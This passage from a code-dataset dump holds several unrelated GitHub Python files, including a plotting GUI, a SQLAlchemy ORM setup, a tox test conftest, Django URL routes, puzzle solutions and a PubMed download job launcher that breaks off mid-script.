self.plot.xsample = params[\"xsample\"]\n self.plot.xunitscale = params[\"xscale\"]\n self.plot.xunitdscale = params[\"xdscale\"]\n #self.plot.plotstroke = params[\"plotstroke\"]\n self.plot.xlabelgap = params[\"xlabelgap\"]\n self.plot.ylabelgap = params[\"ylabelgap\"]\n self.plot.xlabelplaces = params[\"xlabelplaces\"]\n self.plot.ylabelplaces = params[\"ylabelplaces\"]\n #self.plot.labelfontsize = params[\"labelfontsize\"]\n #self.plot.scattersize = params[\"scattersize\"]\n self.plot.yunitscale = params[\"yscale\"]\n self.plot.yunitdscale = params[\"ydscale\"]\n self.plot.yshift = params[\"yshift\"]\n\n self.plot.barwidth = params[\"barwidth\"]\n self.plot.bargap = params[\"bargap\"]\n\n #self.plot.linemode = linecheck.GetValue()\n #self.plot.clipmode = clipcheck.GetValue()\n ##self.plot.scattermode = scattercheck->GetValue();\n #self.plot.fillmode = fillcheck.GetValue()\n\n #self.plot.fillstroke = fillstrokecheck.GetValue()\n #self.plot.strokecolour = strokepicker.GetColour()\n #self.plot.fillcolour = fillpicker.GetColour()\n #self.plot.colour = custom\n\n self.plot.label = self.paramset.GetCon(\"label\").GetText()\n self.plot.xtitle = self.paramset.GetCon(\"xtitle\").GetText()\n self.plot.ytitle = self.paramset.GetCon(\"ytitle\").GetText()\n\n #self.plot.xlogbase = params[\"xlogbase\"]\n #self.plot.ylogbase = params[\"ylogbase\"]\n\n\n def SetControls(self):\n\n self.paramset.GetCon(\"label\").SetValue(self.plot.label)\n self.paramset.GetCon(\"xtitle\").SetValue(self.plot.xtitle)\n self.paramset.GetCon(\"ytitle\").SetValue(self.plot.ytitle)\n\n self.paramset.GetCon(\"xlabels\").SetValue(self.plot.xlabels)\n self.paramset.GetCon(\"ylabels\").SetValue(self.plot.ylabels)\n self.paramset.GetCon(\"xstep\").SetValue(self.plot.xstep)\n self.paramset.GetCon(\"ystep\").SetValue(self.plot.ystep)\n self.paramset.GetCon(\"xplot\").SetValue(self.plot.xplot)\n self.paramset.GetCon(\"yplot\").SetValue(self.plot.yplot)\n self.paramset.GetCon(\"xshift\").SetValue(self.plot.xshift)\n self.paramset.GetCon(\"xsample\").SetValue(self.plot.xsample)\n self.paramset.GetCon(\"xscale\").SetValue(self.plot.xunitscale)\n self.paramset.GetCon(\"xdscale\").SetValue(self.plot.xunitdscale)\n self.paramset.GetCon(\"xlabelgap\").SetValue(self.plot.xlabelgap)\n 
self.paramset.GetCon(\"ylabelgap\").SetValue(self.plot.ylabelgap)\n self.paramset.GetCon(\"xlabelplaces\").SetValue(self.plot.xlabelplaces)\n self.paramset.GetCon(\"ylabelplaces\").SetValue(self.plot.ylabelplaces)\n #self.paramset.GetCon(\"plotstroke\").SetValue(self.plot.plotstroke)\n #self.paramset.GetCon(\"labelfontsize\").SetValue(self.plot.labelfontsize)\n #self.paramset.GetCon(\"scattersize\").SetValue(self.plot.scattersize)\n self.paramset.GetCon(\"yscale\").SetValue(self.plot.yunitscale)\n self.paramset.GetCon(\"ydscale\").SetValue(self.plot.yunitdscale)\n self.paramset.GetCon(\"yshift\").SetValue(self.plot.yshift)\n\n #self.clipcheck.SetValue(self.plot.clipmode)\n #self.linecheck.SetValue(self.plot.linemode)\n ##scattercheck.SetValue(self.plot.scattermode)\n #self.fillcheck.SetValue(self.plot.fillmode)\n #self.fillstrokecheck.SetValue(self.plot.fillstroke)\n #self.symbolrad[self.plot.scattermode].SetValue(True)\n\n self.xtickrad[self.plot.xtickmode].SetValue(True)\n self.ytickrad[self.plot.ytickmode].SetValue(True)\n self.xlabrad[self.plot.xlabelmode].SetValue(True)\n self.ylabrad[self.plot.ylabelmode].SetValue(True)\n self.xscalerad[self.plot.xscalemode].SetValue(True)\n self.yscalerad[self.plot.yscalemode].SetValue(True)\n self.xaxisrad[self.plot.xaxis].SetValue(True)\n self.yaxisrad[self.plot.yaxis].SetValue(True)\n\n #self.strokepicker.SetColour(self.plot.strokecolour)\n #self.fillpicker.SetColour(self.plot.fillcolour)\n\n #self.typechoice.SetSelection(self.typeset.GetIndex(self.plot.type))\n #self.fontchoice.SetSelection(self.fontset.GetIndex(self.plot.labelfont))\n\n\n def ParamLayout(self, numcols = 1): \n # paramset.currlay allows repeated use after adding more parameters, for separate layout\n \n colsize = 0\n box = wx.BoxSizer(wx.HORIZONTAL)\n numparams = self.paramset.NumParams() - self.paramset.currlay\n\n if numcols == 1: colsize = numparams\n if numcols >= 2: colsize = int((numparams + 1) / numcols) \n\n #print(colsize)\n\n pstart = self.paramset.currlay\n for col in range(numcols):\n if col == numcols-1: pstop = self.paramset.currlay + numparams\n else: pstop = self.paramset.currlay + colsize * (col+1)\n #print(f\"col {col} pstart {pstart} pstop {pstop}\")\n vbox = wx.BoxSizer(wx.VERTICAL)\n vbox.AddSpacer(5)\n for pindex in range(pstart, pstop):\n vbox.Add(list(self.paramset.pcons.values())[pindex], 1, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.RIGHT|wx.LEFT, 5)\n vbox.AddSpacer(5)\n box.Add(vbox, 0)\n pstart = pstop\n\n self.paramset.currlay = self.paramset.NumParams()\n return box\n\n\n","repo_name":"HypoModel/HypoModPython","sub_path":"hypograph.py","file_name":"hypograph.py","file_ext":"py","file_size_in_byte":46378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28907914131","text":"import logging\nfrom sqlalchemy import (\n Table, MetaData, Column, Integer, String, Date, JSON, ForeignKey,\n)\nfrom sqlalchemy.orm import mapper, relationship\nfrom src.statistics.models.UploadedFile import UploadedFile\nfrom src.statistics.models.Statistics import Statistics\n\nlogger = logging.getLogger(__name__)\n\nmetadata = MetaData()\n\nuploaded_file = Table(\n 'uploaded_file', metadata,\n Column('id', Integer, primary_key=True, autoincrement=True),\n Column('name', String(50)),\n Column('checksum', String(50)),\n Column('size', Integer),\n Column('row', Integer),\n Column('column', Integer),\n)\nstatistics = Table(\n 'statistics', metadata,\n Column('id', Integer, primary_key=True, 
autoincrement=True),\n Column('file_id', ForeignKey('uploaded_file.id')),\n Column('name', String(50)),\n Column('description', String(2048)),\n Column('data_description', JSON(2048)),\n\n)\n\ndef start_mappers():\n logger.info(\"Starting mappers\")\n uploaded_files = mapper(UploadedFile, uploaded_file)\n stats = mapper(Statistics, statistics, properties={\n 'file': relationship(UploadedFile, lazy='subquery')\n })\n","repo_name":"dawidcdv/stats-back","sub_path":"src/statistics/adapter/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1260511074","text":"from typing import List, Tuple\n\n\nclass Node:\n def __init__(self):\n self.metadata: List[int] = []\n self.children: List[\"Node\"] = []\n\n def iter_metadata(self):\n for m in self.metadata:\n yield m\n for x in self.children:\n for a in x.iter_metadata():\n yield a\n\n def get_value(self):\n if len(self.children) == 0:\n return sum(self.metadata)\n # else:\n value = 0\n for m in self.metadata:\n if m-1 < len(self.children):\n value += self.children[m-1].get_value()\n return value\n\n\ndef parse_input(values: List[int]) -> Tuple[Node, int]:\n \"\"\"\n :param values:\n :return: Tuple [Node, position where node ends\n \"\"\"\n this_node = Node()\n child_nodes = values[0]\n metadata_entries = values[1]\n if child_nodes == 0:\n this_node.metadata = values[2:(2+metadata_entries)]\n return this_node, 2+metadata_entries\n else:\n childnode_start = 2\n for c in range(child_nodes):\n child_node, next_child = parse_input(values[childnode_start:])\n this_node.children.append(child_node)\n childnode_start += next_child\n this_node.metadata = values[childnode_start:childnode_start+metadata_entries]\n return this_node, childnode_start + metadata_entries\n\n\ndef part1():\n text = \"\"\n with open(\"../input/2018/day8.txt\", \"r\") as file:\n text = file.readlines()[0]\n if len(text) == 0:\n return\n values = [int(x) for x in text.split(\" \")]\n rootnode,_ = parse_input(values)\n print(sum(x for x in rootnode.iter_metadata()))\n return rootnode\n\n\ndef part2(rootnode):\n print(rootnode.get_value())\n\n\n#rootnode, _ = parse_input([2,3,0,3,10,11,12,1,1,0,1,99,2,1,1,2])\n#print(sum(x for x in rootnode.iter_metadata()))\n#print(rootnode.get_value())\n\nrootnode = part1()\npart2(rootnode)","repo_name":"seeba8/advent_of_code_2018","sub_path":"src/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"304619582","text":"import py\nimport tox\nimport os\nimport sys\nfrom py.builtin import print_\nfrom fnmatch import fnmatch\nimport time\nfrom tox._config import parseconfig\nfrom tox._venv import VirtualEnv\n\ndef pytest_configure():\n if 'TOXENV' in os.environ:\n del os.environ['TOXENV']\n if 'HUDSON_URL' in os.environ:\n del os.environ['HUDSON_URL']\n\ndef pytest_report_header():\n return \"tox comes from: %r\" % (tox.__file__)\n\ndef pytest_funcarg__newconfig(request):\n tmpdir = request.getfuncargvalue(\"tmpdir\")\n def newconfig(args, source=None):\n if source is None:\n source = args\n args = []\n s = py.std.textwrap.dedent(source)\n p = tmpdir.join(\"tox.ini\")\n p.write(s)\n old = tmpdir.chdir()\n try:\n return parseconfig(args)\n finally:\n old.chdir()\n return newconfig\n\ndef pytest_funcarg__tmpdir(request):\n tmpdir = request.getfuncargvalue(\"tmpdir\")\n 
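# the finalizer restores the working directory captured here once the test is done\n    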
request.addfinalizer(py.path.local().chdir)\n tmpdir.chdir()\n return tmpdir\n\ndef pytest_funcarg__cmd(request):\n return Cmd(request)\n\nclass ReportExpectMock:\n def __init__(self):\n self._calls = []\n self._index = -1\n\n def clear(self):\n self._calls[:] = []\n\n def __getattr__(self, name):\n if name[0] == \"_\":\n raise AttributeError(name)\n\n def generic_report(*args):\n self._calls.append((name,)+args)\n print (\"report %s\" %(args,))\n return generic_report\n\n def expect(self, cat, messagepattern):\n newindex = self._index + 1\n while newindex < len(self._calls):\n lcat, lmsg = self._calls[newindex]\n if lcat == cat and fnmatch(lmsg, messagepattern):\n self._index = newindex\n return\n newindex += 1\n raise AssertionError(\n \"looking for %s(%r), no reports found at >=%d in %r\" %\n (cat, messagepattern, self._index+1, self._calls))\n\nclass pcallMock:\n def __init__(self, args, log, cwd, env=None):\n self.args = args\n self.log = log\n self.cwd = cwd\n self.env = env\n\ndef pytest_funcarg__mocksession(request):\n from tox._cmdline import Session\n class MockSession(Session):\n def __init__(self):\n self._clearmocks()\n #self.config = request.getfuncargvalue(\"newconfig\")([], \"\")\n def getenv(self, name):\n return VirtualEnv(self.config.envconfigs[name], session=self)\n def _clearmocks(self):\n self._pcalls = []\n self.report = ReportExpectMock()\n def make_emptydir(self, path):\n pass\n def pcall(self, args, log, cwd, env=None):\n self._pcalls.append(pcallMock(args, log, cwd, env))\n return MockSession()\n\ndef pytest_funcarg__newmocksession(request):\n mocksession = request.getfuncargvalue(\"mocksession\")\n newconfig = request.getfuncargvalue(\"newconfig\")\n def newmocksession(args, source):\n config = newconfig(args, source)\n mocksession.config = config\n return mocksession\n return newmocksession\n\nclass Cmd:\n def __init__(self, request):\n self.tmpdir = request.getfuncargvalue(\"tmpdir\")\n self.request = request\n current = py.path.local()\n self.request.addfinalizer(current.chdir)\n def chdir(self, target):\n target.chdir()\n\n def popen(self, argv, stdout, stderr, **kw):\n if not hasattr(py.std, 'subprocess'):\n py.test.skip(\"no subprocess module\")\n env = os.environ.copy()\n env['PYTHONPATH'] = \":\".join(filter(None, [\n str(os.getcwd()), env.get('PYTHONPATH', '')]))\n kw['env'] = env\n #print \"env\", env\n return py.std.subprocess.Popen(argv, stdout=stdout, stderr=stderr, **kw)\n\n def run(self, *argv):\n argv = [str(x) for x in argv]\n p1 = self.tmpdir.join(\"stdout\")\n p2 = self.tmpdir.join(\"stderr\")\n print(\"%s$ %s\" % (os.getcwd(), \" \".join(argv)))\n f1 = p1.open(\"wb\")\n f2 = p2.open(\"wb\")\n now = time.time()\n popen = self.popen(argv, stdout=f1, stderr=f2,\n close_fds=(sys.platform != \"win32\"))\n ret = popen.wait()\n f1.close()\n f2.close()\n out = p1.read(\"rb\")\n out = getdecoded(out).splitlines()\n err = p2.read(\"rb\")\n err = getdecoded(err).splitlines()\n def dump_lines(lines, fp):\n try:\n for line in lines:\n py.builtin.print_(line, file=fp)\n except UnicodeEncodeError:\n print(\"couldn't print to %s because of encoding\" % (fp,))\n dump_lines(out, sys.stdout)\n dump_lines(err, sys.stderr)\n return RunResult(ret, out, err, time.time()-now)\n\ndef getdecoded(out):\n try:\n return out.decode(\"utf-8\")\n except UnicodeDecodeError:\n return \"INTERNAL not-utf8-decodeable, truncated string:\\n%s\" % (\n py.io.saferepr(out),)\n\nclass RunResult:\n def __init__(self, ret, outlines, errlines, duration):\n self.ret = ret\n self.outlines 
= outlines\n self.errlines = errlines\n self.stdout = LineMatcher(outlines)\n self.stderr = LineMatcher(errlines)\n self.duration = duration\n\nclass LineMatcher:\n def __init__(self, lines):\n self.lines = lines\n\n def str(self):\n return \"\\n\".join(self.lines)\n\n def fnmatch_lines(self, lines2):\n if isinstance(lines2, str):\n lines2 = py.code.Source(lines2)\n if isinstance(lines2, py.code.Source):\n lines2 = lines2.strip().lines\n\n from fnmatch import fnmatch\n lines1 = self.lines[:]\n nextline = None\n extralines = []\n __tracebackhide__ = True\n for line in lines2:\n nomatchprinted = False\n while lines1:\n nextline = lines1.pop(0)\n if line == nextline:\n print_(\"exact match:\", repr(line))\n break\n elif fnmatch(nextline, line):\n print_(\"fnmatch:\", repr(line))\n print_(\" with:\", repr(nextline))\n break\n else:\n if not nomatchprinted:\n print_(\"nomatch:\", repr(line))\n nomatchprinted = True\n print_(\" and:\", repr(nextline))\n extralines.append(nextline)\n else:\n assert line == nextline\n\ndef pytest_funcarg__initproj(request):\n \"\"\" create a factory function for creating example projects. \"\"\"\n tmpdir = request.getfuncargvalue(\"tmpdir\")\n def initproj(name, filedefs=None):\n if filedefs is None:\n filedefs = {}\n parts = name.split(\"-\")\n if len(parts) == 1:\n parts.append(\"0.1\")\n name, version = parts\n base = tmpdir.ensure(name, dir=1)\n create_files(base, filedefs)\n if 'setup.py' not in filedefs:\n create_files(base, {'setup.py': '''\n from setuptools import setup\n setup(\n name='%(name)s',\n description='%(name)s project',\n version='%(version)s',\n license='GPLv2 or later',\n platforms=['unix', 'win32'],\n packages=['%(name)s', ],\n )\n ''' % locals()})\n if name not in filedefs:\n create_files(base, {name:\n {'__init__.py': '__version__ = %s' % version}})\n print (\"created project in %s\" %(base,))\n base.chdir()\n return initproj\n\ndef create_files(base, filedefs):\n for key, value in filedefs.items():\n if isinstance(value, dict):\n create_files(base.ensure(key, dir=1), value)\n elif isinstance(value, str):\n s = py.std.textwrap.dedent(value)\n base.join(key).write(s)\n","repo_name":"24x-fi/pytox","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5754368593","text":"\n\ndef load_instruction(file):\n \"\"\"\n Loads instruction from file\n\n Parameters:\n - file: file to load from, written in name[string] -> cpp_code[string] csv format\n\n Returns:\n - an instruction, i.e. a dictionary in name[string] -> cpp_code[string] format\n \"\"\"\n try:\n import csv\n dict_from_csv = {}\n with open(file, mode='r') as inp:\n reader = csv.reader(inp)\n dict_from_csv = {rows[0]: rows[1] for rows in reader}\n return dict_from_csv\n except Exception:\n import traceback\n print(traceback.print_exc())\n\n\ndef save_instruction(file, object):\n \"\"\"\n Saves instruction to file\n\n Parameters:\n - file: file to save to\n - object: instruction to save, i.e. 
a dictionary in name[string] -> cpp_code[string] format\n    \"\"\"\n    try:\n        import csv\n        f = csv.writer(open(file, 'w'))\n        for key, val in object.items():\n            f.writerow([key, val])\n    except Exception:\n        import traceback\n        print(traceback.print_exc())\n\n\ndef dataframe_reshaper(tree, instruction, df_range=None, intermediate_tree_save_path=None, vectorization=True):\n    \"\"\"\n    Reshapes a tree according to an instruction, resulting in a pd.DataFrame\n\n    Parameters:\n    - tree: a ROOT.TTree object\n    - instruction: an instruction, a dictionary in name[string] -> cpp_code[string] format, \n        that defines tree reshaping\n    - df_range: an iterable of form (begin, end, stride=1). If applied, reshaping is only performed on the specified range\n    - intermediate_tree_save_path: reshaped tree save path. If not specified, the intermediate tree is discarded\n    - vectorization: if True, checks whether there are columns with vector types, effectively replacing them with lists.\n        Disabling this feature is safe if you do not have vectorized data (should be cheap anyway), otherwise behaviour is not well defined.\n\n    Returns:\n    - a pd.DataFrame, filled in accordance with the instruction\n    \"\"\"\n    import ROOT\n    import pandas as pd\n    rdf = ROOT.RDataFrame(tree)\n    for name, cpp_code in instruction.items():\n        rdf = rdf.Define(name, cpp_code)\n\n    if df_range is not None:\n        rdf = rdf.Range(*df_range)\n    if intermediate_tree_save_path is not None:\n        rdf.Snapshot('reshaped_tree', intermediate_tree_save_path,\n                     {*instruction.keys()})\n    \n    df = rdf.AsNumpy(columns=[*instruction.keys()])\n    \n    if vectorization:\n        import numpy as np\n        for column in df.keys():\n            # check if column is vector-like\n            if len(np.array([df[column][0]]).shape) > 1:\n                # convert to lists; materialize eagerly (a lazy map object cannot back a DataFrame column)\n                df[column] = [list(ar) for ar in df[column]]\n    \n    df = pd.DataFrame(df)\n    \n    return df\n","repo_name":"Silence2107/MaNNager","sub_path":"libs/reshaper.py","file_name":"reshaper.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7056390367","text":"from django.urls import path\r\nfrom . 
import views\r\nfrom django.contrib.auth.views import LoginView, LogoutView\r\n\r\nurlpatterns = [\r\n path('', views.home),\r\n path('login/', LoginView.as_view(template_name='accounts/login.html'), name=\"login\"),\r\n path('logout/', LogoutView.as_view(template_name='accounts/logout.html'), name=\"logout\"),\r\n path('register/', views.register, name=\"register\"),\r\n path('search/', views.search, name=\"search\"),\r\n path('admin/', views.admin, name=\"admin\"),\r\n path('cart/', views.cart, name=\"cart\"),\r\n path('orders/', views.orders, name=\"orders\"),\r\n path('addBook/', views.addBook, name=\"addBook\"),\r\n path('deleteBook/', views.deleteBook, name=\"deleteBook\"),\r\n path('editBook/', views.editBook, name=\"editBook\"),\r\n path('addUser/', views.addUser, name=\"addUser\"),\r\n path('deleteUser/', views.deleteUser, name=\"deleteUser\"),\r\n path('editUser/', views.editUser, name=\"editUser\"),\r\n path('addOrder/', views.addOrder, name=\"addOrder\"),\r\n path('deleteOrder/', views.deleteOrder, name=\"deleteOrder\"),\r\n path('updateOrder/', views.updateOrder, name=\"updateOrder\"),\r\n path('addOrderedItems/', views.addOrderedItems, name=\"addOrderedItems\"),\r\n]\r\n","repo_name":"ksylve05/PythonBookStore","sub_path":"tutorial/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38168155741","text":"import re\n\ntravel_points = 0\nlst = []\n\ntext = input()\nregex = r'=[A-Z][A-Za-z]{2,}=|/[A-Z][A-Za-z]{2,}/'\n\nmatches = re.findall(regex, text)\n\nfor element in matches:\n if '=' in element:\n clean_word = element.strip('=')\n else:\n clean_word = element.strip('/')\n\n lst.append(clean_word)\n travel_points += len(clean_word)\n\ndestinations_output = ', '.join(lst)\n\nprint(f'Destinations: {destinations_output}')\nprint(f'Travel Points: {travel_points}')\n","repo_name":"lubodonchev/SoftUni_Coursework","sub_path":"First_Project/SoftUni Python Fundamentals May 2023/Final Exam Preparation/destination.py","file_name":"destination.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4368254721","text":"\"\"\"Data for quantum decision trees.\n\"\"\"\nfrom abc import ABC, abstractmethod\nimport numpy as np\nimport os\n\n\nclass BDS(ABC): # Binary data set\n \"\"\"Abstract base class for binary data sets.\n \n Parameters\n ----------\n \n **kwargs : Arguments for data loader.\n \"\"\"\n \n def __init__(self, **kwargs):\n self._load(**kwargs)\n self._X = BDS._ensure_array(self._X).astype(bool)\n self._y = BDS._ensure_array(self._y).astype(bool)\n \n @property\n def X(self):\n \"\"\"numpy.ndarray of shape (n_samples,n_features) : Features.\n \"\"\"\n return self._X\n\n @property\n def y(self):\n \"\"\"numpy.ndarray of shape (n_samples,n_labels) : Labels.\n \"\"\"\n return self._y\n \n @staticmethod\n def _ensure_array(a):\n a = np.asarray(a)\n if len(a.shape) == 1:\n a = a.reshape(-1,1)\n return a\n \n def __str__(self):\n return f\"X: {self.X.shape}, y: {self.y.shape}\"\n \n @abstractmethod\n def _load(self, **kwargs):\n raise NotImplementedError \n \nclass BDS_test(BDS):\n \"\"\"Binary data set: XOR test data set consisting of 7 features and 1 label.\n \n Parameters\n ----------\n \n **kwargs :\n ``N`` (``int``) determines the number of data points, defaults to 5.\n \"\"\"\n \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n \n 
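# Toy construction: the label is y = (x1 + x2 + x3) mod 2, i.e. a 3-input XOR; features 4-7 are all-zero padding\n    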
def _load(self, N=5):\n x1 = [[1,0,0,0,1] + [0]*(N-5)]\n x2 = [[1,1,0,0,1] + [0]*(N-5)]\n x3 = [[0,1,1,0,1] + [0]*(N-5)]\n x4 = [[0 for n in range(N)]]\n x5 = [[0 for n in range(N)]]\n x6 = [[0 for n in range(N)]]\n x7 = [[0 for n in range(N)]]\n y1 = [[(a+b+c)%2 for a,b,c in zip(x1[0],x2[0],x3[0])]]\n X = np.concatenate((x1,x2,x3,x4,x5,x6,x7),axis=0).T\n y = np.concatenate((y1),axis=0).T\n self._X = np.asarray(X)\n self._y = np.asarray(y).reshape(-1,1) \n \n\nclass BDS_tic_tac_toe(BDS):\n \"\"\"Binary data set: Binarized version of the Tic-Tac-Toe Endgame Data Set.\n Each 15-dimensional feature vector represents a Tic-Tac-Toe playfield, the \n corresponding label represents the winning player.\n \n Original source: https://archive.ics.uci.edu/ml/datasets/Tic-Tac-Toe+Endgame\n \n Original creator: David W. Aha (aha@cs.jhu.edu)\n \n Note: Encoding to binary and decoding from binary is realized via \n ``BDS_tic_tac_toe._encode_x`` and \n ``BDS_tic_tac_toe._decode_x``, respectively.\n \n Parameters\n ----------\n \n root : str\n Root directory to load data file ``data/tictactoe/tic-tac-toe.npz``.\n \n **kwargs :\n Unused.\n \"\"\"\n \n def __init__(self, root=\"\", **kwargs):\n self._root = root\n super().__init__(**kwargs)\n \n @staticmethod\n def _encode_x(x, N=15): # ternary -> int -> binary\n \n def x_to_int(x):\n i = 0\n for idx, val in enumerate(x[::-1]):\n i += val*3**idx\n return i\n \n def int_to_b(i, N):\n b = [0 for _ in range(N)]\n bin_str = bin(i)[2:] # bit string\n for idx, val in enumerate(bin_str):\n b[N-len(bin_str)+idx] = int(val)\n #b = b[::-1]\n return b\n \n def convert_x(x):\n return int_to_b(x_to_int(x), N)\n \n x = np.array(x).ravel()\n assert x.size == 9\n return convert_x(x)\n \n @staticmethod\n def _decode_x(x, N=9): # binary -> int -> ternary\n \n def x_to_int(x):\n i = 0\n for idx, val in enumerate(x[::-1]):\n i += val*2**idx\n return i\n \n def int_to_t(i, N):\n t = [0 for _ in range(N)]\n ter_str = np.base_repr(i, base=3)\n for idx, val in enumerate(ter_str):\n t[N-len(ter_str)+idx] = int(val)\n #t = t[::-1]\n return t\n \n def convert_x(x):\n return int_to_t(x_to_int(x), N)\n \n x = np.array(x).ravel()\n assert x.size == 15\n return convert_x(x)\n \n @staticmethod\n def print_playfield(x):\n \"\"\"Print playfield represented by feature vector ``x``.\n \"\"\"\n \n x = np.asarray(x.copy()).ravel()\n if x.size == 9:\n pass\n elif x.size == 15:\n x = BDS_tic_tac_toe._decode_x(x)\n else:\n raise ValueError\n \n x = np.asarray(x, dtype=object).ravel()\n x[x==0] = 'X' # x\n x[x==1] = 'O' # o\n x[x==2] = ' ' # b\n \n print(\"_____\")\n print(\"|{}{}{}|\".format(x[0],x[1],x[2]))\n print(\"|{}{}{}|\".format(x[3],x[4],x[5]))\n print(\"|{}{}{}|\".format(x[6],x[7],x[8]))\n print(\"`````\") \n \n def _load(self, **kwargs):\n data_file = os.path.join(self._root, \"data/tictactoe/tic-tac-toe.npz\")\n data = np.load(data_file)\n self._X = data['X']\n self._y = data['y']\n","repo_name":"RaoulHeese/qtree","sub_path":"src/qtree/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"2646883368","text":"from django.urls import path\n#from Aplicaciones.Compra.views.dashboard.views import DashboardView\nfrom Aplicaciones.Compra.views.proveedor.views import *\nfrom Aplicaciones.Compra.views.orden_compra.views import *\nfrom Aplicaciones.Compra.views.compra.views import *\nfrom Aplicaciones.Compra.views.pago.views import *\napp_name = 'Compra'\n\nurlpatterns = 
[\n    #proveedor\n    path('proveedor/list/',ProveedorListView.as_view(),name='proveedor_list'),\n    path('proveedor/create/',ProveedorCreateView.as_view(),name='proveedor_create'),\n    path('proveedor/edit/<int:pk>/',ProveedorUpdateView.as_view(),name='proveedor_edit'),\n    path('proveedor/delete/<int:pk>/',ProveedorDeleteView.as_view(),name='proveedor_delete'),\n    #OrdenCompra\n    path('ordenCompra/create/',OrdenCompraCreateView.as_view(),name='orden_compra_create'),\n    path('ordenCompra/list/', OrdenCompraListView.as_view(), name='orden_compra_list'),\n    path('ordenCompra/edit/<int:pk>/',OrdenCompraUpdateView.as_view(),name='orden_compra_edit'),\n    path('ordenCompra/delete/<int:pk>/', OrdenCompraDeleteView.as_view(), name='orden_compra_delete'),\n    #pdf con weasyprint\n    path('ordenCompra/pdf/<int:pk>/', OrdenCPdfView.as_view(), name='ordenCompra_pdf'),\n    path('compra/pdf/<int:pk>/', CompraPdfView.as_view(), name='compra_pdf'),\n    #Compra\n    path('create/',CompraCreateView.as_view(),name='compra_create'),\n    path('list/',CompraListView.as_view(),name='compra_list'),\n    path('edit/<int:pk>/',CompraUpdateView.as_view(),name='compra_edit'),\n    #Cta_X_pagar\n    path('cta_x_pagar/list/',Cta_X_Pagar_ListView.as_view(),name='cta_x_pagar_list'),\n    #Pago\n    path('pago/create/',PagoCreateView.as_view(),name='pago_create'),\n    #html\n    path('compra/<int:pk>/',CompraView.as_view(), name='compra'),\n\n\n]\n","repo_name":"walterje/SAWA","sub_path":"Aplicaciones/Compra/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3957956911","text":"import sys\nfrom collections import deque\n\ndy = [1, -1, 0, 0, 0, 0]\ndx = [0, 0, 1, -1, 0, 0]\ndz = [0, 0, 0, 0, 1, -1]\n\ndef bfs(q):\n    days = -1\n\n    while q:\n        days += 1\n\n        for n in range(len(q)):\n            z, y, x = q.popleft()\n\n            for i in range(6):\n                ny, nx, nz = y + dy[i], x + dx[i], z + dz[i]\n                if 0 <= ny < N and 0 <= nx < M and 0 <= nz < H and box[nz][ny][nx] == 0:\n                    box[nz][ny][nx] = box[z][y][x] + 1\n                    q.append((nz, ny, nx))\n\n    for b in box:\n        for b1 in b:\n            if 0 in b1:\n                return -1\n    return days\n\nM, N, H = map(int, sys.stdin.readline().split())\nbox = [[list(map(int, sys.stdin.readline().split())) for _ in range(N)] for _ in range(H)]\nq, dist = deque(), [[[0] * M for _ in range(N)] for _ in range(H)]\n\nfor z in range(H):\n    for y in range(N):\n        for x in range(M):\n            if box[z][y][x] == 1:\n                q.append((z, y, x))\n\nprint(bfs(q))","repo_name":"hybae430/Baekjoon","sub_path":"7569.py","file_name":"7569.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24703462873","text":"#!/usr/bin/env python2\n\n# This script will launch instances of download_pubmed_muhaha.py\n\nimport os\nimport pubmed\nfrom utils import read_pmid_groups\n\n# First we need to download full article text\n# Create a pubmed object\nemail = \"vsochat@stanford.edu\"\npm = pubmed.Pubmed(email)\n\n# Get pubmed ids for all articles in database\npc_ids = list(pm.ftp[\"PMCID\"])\n\n# We are going to download them here\ndownload_folder = \"/scratch/PI/dpwall/DATA/PUBMED/articles\"\nemail = \"vsochat@stanford.edu\"\n\n# Submit scripts to download in batches of 100\nstart = 0\niters = len(pc_ids)/100\n\n# Prepare and submit a job for each\nfor i in range(5000,iters):\n    start = i*100\n    if i != iters:\n        end = start + 100\n    else:\n        end = len(pc_ids)\n    jobname = \"pm_%s-%s\" %(start,end)\n    filey = open(\".job/%s.job\" % (jobname),\"w\")\n    
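# write a SLURM batch script for this batch of PMC IDs; it is submitted with sbatch below\n    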
